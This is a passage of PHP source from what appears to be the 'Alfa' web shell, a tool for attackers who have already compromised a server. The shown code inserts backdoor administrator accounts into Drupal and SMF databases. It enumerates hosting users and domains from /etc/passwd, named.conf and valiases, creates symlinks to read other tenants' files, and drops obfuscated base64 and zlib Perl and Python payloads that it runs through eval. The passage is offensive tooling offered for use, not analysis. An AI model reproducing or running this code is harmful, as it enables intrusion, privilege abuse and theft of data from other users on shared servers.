 array(`color` => `FFFFFF`, `tdName` => `Db Name`, `id`=>`db_name`,`inputName` => `database`, `inputValue` => ``, `inputSize` => `50`),

 `td3` =>

 array(`color` => `FFFFFF`, `tdName` => `Db User`, `id`=>`db_user`,`inputName` => `username`, `inputValue` => ``, `inputSize` => `50`),

 `td4` =>

 array(`color` => `FFFFFF`, `tdName` => `Db Pass`, `id`=>`db_pw`,`inputName` => `password`, `inputValue` => ``, `inputSize` => `50`),

 `td6` =>

 array(`color` => `FF0000`, `tdName` => `Admin User`, `inputName` => `admin`, `inputValue` => `admin`, `inputSize` => `50`),

 `td7` =>

 array(`color` => `FF0000`, `tdName` => `Admin Pass`, `inputName` => `toftof`, `inputValue` => `solevisible`, `inputSize` => `50`, `disabled` => true)

 );

create_table($table);

echo `
`;

if ($_POST[`alfa1`] && $_POST[`alfa1`] == `>>`){

$localhost = $_POST[`alfa2`];

$database = $_POST[`alfa4`];

$username = $_POST[`alfa5`];

$password = $_POST[`alfa6`];

$admin = $_POST[`alfa8`];

$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));

$getDescuid = @mysqli_query($conn,"select uid from users order by uid desc limit 0,1");

$getDescuid = @mysqli_fetch_assoc($getDescuid);

$getDescuid = $getDescuid[`uid`];

$getdescuid = $getDescuid++;

$solevisible=@mysqli_query($conn,"insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values(`$getDescuid`,`$admin`,`$S$DP2y9AbolCBOd/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC`,`solevisible@fbi.gov`,`filtered_html`,`1`,`Europe/Berlin`,`solevisible@fbi.gov`)") or die(mysqli_error($conn));

$solevisible=@mysqli_query($conn,"select uid from users where name=`".$admin."`") or die(mysqli_error($conn));

$sole = mysqli_num_rows($solevisible);

if ($sole == 1){

$solevis = mysqli_fetch_assoc($solevisible);

$res = $solevis[`uid`];

}

$solevisible=@mysqli_query($conn,"INSERT INTO users_roles (uid,rid) VALUES (`".$res."`, `3`)") or die(mysqli_error($conn));

if($solevisible){

__alert(`Success... `.$admin.` is created...`);}

}

}



if(isset($_POST[`alfa10`]) && $_POST[`alfa10`] == `smf`){



echo __pre().`
| SMF |
`.getConfigHtml(`smf`).`
`;

$table = array(`td1` =>

 array(`color` => `FFFFFF`, `tdName` => `Mysql Host`, `id`=>`db_host`,`inputName` => `localhost`, `inputValue` => `localhost`, `inputSize` => `50`),

 `td2` =>

 array(`color` => `FFFFFF`, `tdName` => `Db Name`, `id`=>`db_name`,`inputName` => `database`, `inputValue` => ``, `inputSize` => `50`),

 `td3` =>

 array(`color` => `FFFFFF`, `tdName` => `Db User`, `id`=>`db_user`,`inputName` => `username`, `inputValue` => ``, `inputSize` => `50`),

 `td4` =>

 array(`color` => `FFFFFF`, `tdName` => `Db Pass`, `id`=>`db_pw`,`inputName` => `password`, `inputValue` => ``, `inputSize` => `50`),

 `td5` =>

 array(`color` => `FFFFFF`, `tdName` => `Table Prefix`, `id`=>`db_prefix`,`inputName` => `prefix`, `inputValue` => `smf_`, `inputSize` => `50`),

 `td6` =>

 array(`color` => `FF0000`, `tdName` => `Admin User`, `inputName` => `admin`, `inputValue` => `admin`, `inputSize` => `50`),

 `td7` =>

 array(`color` => `FF0000`, `tdName` => `Admin Pass`, `inputName` => `hi`, `inputValue` => `solevisible`, `inputSize` => `50`, `disabled` => true),

 );

create_table($table);

echo `
`;

if ($_POST[`alfa1`] && $_POST[`alfa1`] == `>>`){

$localhost = $_POST[`alfa2`];

$database = $_POST[`alfa3`];

$username = $_POST[`alfa5`];

$password = $_POST[`alfa6`];

$prefix = $_POST[`alfa7`];

$admin = $_POST[`alfa8`];

$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));

$setpwAlg = sha1(strtolower($admin) . `solevisible`);

$solevisible=@mysqli_query($conn,"insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,`$admin`,`1`,`$admin`,`$setpwAlg`,`solevisible@fbi.gov`)") or die(mysqli_error($conn));

if($solevisible){

__alert(`Success... `.$admin.` is created...`);}

}

}

echo "
";

alfafooter();

}

function alfaMakePwd(){

    if(_alfa_file_exists("/etc/virtual/domainowners")||(_alfa_file_exists("/etc/named.conf")&&_alfa_file_exists("/etc/valiases"))){

        return "/home/{user}/public_html/";

    }

    $document = explode("/", $_SERVER["DOCUMENT_ROOT"]);

    $public = end($document);

    array_pop($document);

    array_pop($document);

    $path = implode("/", $document) . "/{user}/" . $public;

    return $path;

}

function alfaGetDomains($state = false){

    $state = "named.conf";

    $lines = array();

    $lines = _alfa_file(`/etc/named.conf`);

    if(!$lines){

        $lines = @scandir("/etc/valiases/");

        $state = "valiases";

        if(!$lines){

            $lines = @scandir("/var/named");

            $state = "named";

            if(!$lines && $state){

                $lines = _alfa_file(`/etc/passwd`);

                $state = "passwd";

            }

        }

    }

    return array("lines" => $lines, "state" => $state);

}

function alfasymlink(){

alfahead();

AlfaNum(9,10);

echo `

| Symlink |
| Symlink( php ) | | Symlink( perl ) | | Symlink( python ) | | File Symlink | `;

if(isset($_POST[`alfa2`])&&($_POST[`alfa2`]==`symperl`||$_POST["alfa2"]=="sympy")){

    $sympath = alfaMakePwd();

    @mkdir(`cgialfa`,0755);

    @chdir(`cgialfa`);

    alfacgihtaccess(`cgi`);

    $perl = `#!/usr/bin/perl   -I/usr/local/bandmin`."
".`use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));`;

    $py = `#!/usr/bin/python`."
import zlib, base64
".`eval(compile(zlib.decompress(base64.b64decode("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")),``,`exec`))`;

    $cginame = "symperl.alfa";

    $source = $perl;

    $lang = "perl";

    if($_POST["alfa2"]=="sympy"){

        $cginame = "pysymlink.alfa";

        $source = $py;

        $lang = "python";

    }

    @__write_file($cginame,$source);

    @chmod($cginame,0755);

    echo __pre();

    $resource = alfaEx("{$lang} {$cginame} {$sympath}",false,true,true);

    if(strlen($resource) == 0){

        echo AlfaiFrameCreator(`cgialfa/`.$cginame);

    }else{

        echo $resource;

    }

}

if(isset($_POST[`alfa4`]) && $_POST[`alfa4`]==`SymFile`){

if(function_exists(`symlink`)||_alfa_can_runCommand(true,true)){

AlfaNum(9,10);

echo __pre().`

| Symlink File And Directory |







`;

$path = $_POST[`alfa5`];

$symname = $_POST[`alfa6`];

$solevisible58 = $_POST[`alfa7`];

if($solevisible58){

$new_name = str_replace(".", "_", basename($symname));

$rand_dir = $new_name.rand(111,9999);

$sym_dir = `alfasymlinkphp/`.$rand_dir.`/`;

@mkdir($sym_dir, 0777, true);

alfacgihtaccess(`sym`, $sym_dir, $symname);

_alfa_symlink("$path","$sym_dir/$symname");

echo __pre();

echo `Click >> `.$symname.``;

}

}else{echo "
[+] Symlink Function Disabled !";}

}

if(isset($_POST[`alfa2`]) && $_POST[`alfa2`]==`symphp`){

$cant_symlink = true;

if(function_exists(`symlink`)||_alfa_can_runCommand(false,false)){

@mkdir(`alfasymlink`,0777);

alfacgihtaccess(`sym`,`alfasymlink/`);

_alfa_symlink(`/`,`alfasymlink/root`);

$table_header = "

";

if(_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/")){

echo "";

$lines = array();

$anony_domains = array();

$anonymous_users = array();

$f_black = array();

$error = false;

$anonymous = false;

$makepwd = "/home/{user}/public_html/";

$domains = alfaGetDomains();

$lines = $domains["lines"];

$state = $domains["state"];

$is_posix = function_exists("posix_getpwuid") && function_exists("fileowner");

$can_runcmd = _alfa_can_runCommand(false,false);

if(!$is_posix && !$can_runcmd){

    $anonymous = true;

    $anony_domains = $domains["lines"];

    $lines = _alfa_file(`/etc/passwd`);

}

echo $table_header;

$count=1;

$template = ``;

foreach($lines as $line){

    $domain = "";

    $owner = "";

    if($anonymous){

        $explode = explode(":", $line);

        $owner = $explode[0];

        $owner_len = strlen($owner) - 1;

        $userid = $explode[2];

        if((int)$userid < 500)continue;

        $domain = "[?????]";

        $temp_black = array();

        $finded = false;

        foreach($anony_domains as $anony){

            if($state == "named.conf"){

                if(@strstr($anony, `zone`)){

                    preg_match_all(`#zone "(.*)"#`,$anony, $data);

                    $domain = $data[1][0];

                }else{

                    continue;

                }

            }elseif($state == "named" || $state == "valiases"){

                if($anony == "." || $anony == "..")continue;

                if($state == "named")$anony = rtrim($anony, ".db");

                $domain = $anony;

            }

            $sub_domain = str_replace(array("-","."), "", $domain);

            if(substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)){

                if(in_array($owner.$domain, $temp_black))continue;

                $sympath = str_replace("{user}", $owner, $makepwd);

                $http = "http://".$domain;

                echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);

                $count++;

                $temp_black[] = $owner.$domain;

                $finded = true;

            }

        }

        if(!$finded){

            $anonymous_users[] = $owner;

        }

    }else{

         if($state == "named.conf"){

            if(@strstr($line, `zone`)){

                preg_match_all(`#zone "(.*)"#`,$line, $data);

                $domain = $data[1][0];

            }else{

                continue;

            }

        }elseif($state == "named" || $state == "valiases"){

            if($line == "." || $line == "..")continue;

            if($state == "named")$line = rtrim($line, ".db");

            $domain = $line;

        }

        if(strlen(trim($domain)) > 2 && $state != "passwd"){

            if(!_alfa_file_exists(`/etc/valiases/`.$domain, false))continue;

            if($is_posix){

                $user = @posix_getpwuid(@fileowner(`/etc/valiases/`.$domain));

                $owner = $user["name"];

            }elseif($can_runcmd){

                $owner = alfaEx("stat -c `%U` /etc/valiases/".$domain,false,false);

            }

        }

    }

    if(!$anonymous){

        if(strlen($owner)==0 || in_array($owner.$domain, $f_black))continue;

        $sympath = str_replace("{user}", $owner, $makepwd);

        $http = "http://".$domain;

        if($state == "passwd"){

            $http = "javascript:alert(`we cant find domain...`)";

        }

        echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);

        $count++;

        $f_black[] = $owner.$domain;

    }

}

if($anonymous){

    foreach($anonymous_users as $owner){

        $sympath = str_replace("{user}", $owner, $makepwd);

        $http = "javascript:alert(`we cant find domain...`)";

        echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, "[????]", $owner, $sympath), $template);

        $count++;

    }

}

$cant_symlink = false;

}else{

$is_direct = false;

$makepwd = alfaMakePwd();

if(_alfa_file_exists("/etc/virtual/domainowners")){

    $makepwd = "/home/{user}/public_html";

    $is_direct = true;

}

$sole = _alfa_file("/etc/virtual/domainowners");

$count=1;

echo $table_header;

$template = ``;

if($sole){

    foreach($sole as $visible){

        if(@strstr($visible,":")){

            $solevisible = explode(`:`, $visible);

            $cwd = str_replace("{user}", trim($solevisible[1]), $makepwd);

            echo str_replace(array("{count}","{user}","{url}","{cwd}"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template);

        }

    }

}else{

    $passwd = _alfa_file("/etc/passwd");

    if($passwd){

        $html = "";

        $is_named = false;

        $users = array();

        $domains = array();

        $uknowns = array();

        foreach($passwd as $user){

            $user = trim($user);

            $expl = explode(":", $user);

            if((int)$expl[2] < 500)continue;

            $users[$expl[0]] = $expl[5];

        }

        $site_domains = @scandir("/etc/virtual/");

        if(!$site_domains){

            $site_domains = alfaEx("ls /etc/virtual/");

            $site_domains = explode("
", $site_domains);

            if(!$site_domains){

                $site_domains = _alfa_file("/etc/named.conf");

                if($site_domains){$is_named = true;}

            }

        }

        foreach($site_domains as $line){

            if($is_named){

                if(@strstr($line, `zone`)){

                    preg_match_all(`#zone "(.*)"#`,$line, $data);

                    $domain = $data[1][0];

                    if(strlen($domain  > 2) && !empty($domain)){

                        $domains[] = $domain;

                    }

                }

            }else{

                $domains[] = $line;

            }

        }

        $x = 1;

        foreach($users as $user => $home){

            foreach($domains as $domain){

                $user_len = strlen($user) - 1;

                $sub_domain = str_replace(array("-","."), "", $domain);

                $five_user = substr($user, 0,$user_len);

                $five_domain = substr($sub_domain, 0,$user_len);

                if($five_user == $five_domain){

                    if($is_direct){

                        $cwd = str_replace("{user}", $user, $makepwd);

                    }else{

                        $expl = explode("}/", $makepwd);

                        $cwd = $home."/".$expl[1];

                    }

                    $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, $domain, $cwd), $template);

                }else{

                    $uknowns[$user] = $home;

                }

            }

        }

        $uknowns = array_unique($uknowns);

        foreach($uknowns as $user => $home){

            if($is_direct){

                $cwd = str_replace("{user}", $user, $makepwd);

            }else{

                $expl = explode("}/", $makepwd);

                $cwd = $home."/".$expl[1];

            }

            $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, "[?????]", $cwd), $template);

        }

        echo($html);

    }

}

echo "
*
Domains
Users
symlink
{count}
{domain} 
{owner}
Symlink
{count}
{url} 
{user}
Symlink
";

$cant_symlink = false;

}

}else{

    echo "
[+] Symlink Function Disabled !";

    $cant_symlink = false;

}

if($cant_symlink)echo `

Error...
`;

echo "